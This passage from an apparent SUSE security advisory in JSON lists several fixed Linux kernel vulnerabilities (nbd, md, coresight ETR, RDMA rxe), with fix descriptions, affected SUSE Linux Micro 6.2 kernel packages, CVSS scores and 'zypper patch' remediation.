"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68374"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix rcu protection in md_wakeup_thread\n\nWe attempted to use RCU to protect the pointer \u0027thread\u0027, but directly\npassed the value when calling md_wakeup_thread(). This means that the\nRCU pointer has been acquired before rcu_read_lock(), which renders\nrcu_read_lock() ineffective and could lead to a use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68374",
"url": "https://www.suse.com/security/cve/CVE-2025-68374"
},
{
"category": "external",
"summary": "SUSE Bug 1255530 for CVE-2025-68374",
"url": "https://bugzilla.suse.com/1255530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68374"
},
{
"cve": "CVE-2025-68376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68376"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncoresight: ETR: Fix ETR buffer use-after-free issue\n\nWhen ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed\nand enabled again, currently sysfs_buf will point to the newly\nallocated memory(buf_new) and free the old memory(buf_old). But the\netr_buf that is being used by the ETR remains pointed to buf_old, not\nupdated to buf_new. In this case, it will result in a memory\nuse-after-free issue.\n\nFix this by checking ETR\u0027s mode before updating and releasing buf_old,\nif the mode is CS_MODE_SYSFS, then skip updating and releasing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68376",
"url": "https://www.suse.com/security/cve/CVE-2025-68376"
},
{
"category": "external",
"summary": "SUSE Bug 1255529 for CVE-2025-68376",
"url": "https://bugzilla.suse.com/1255529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68376"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 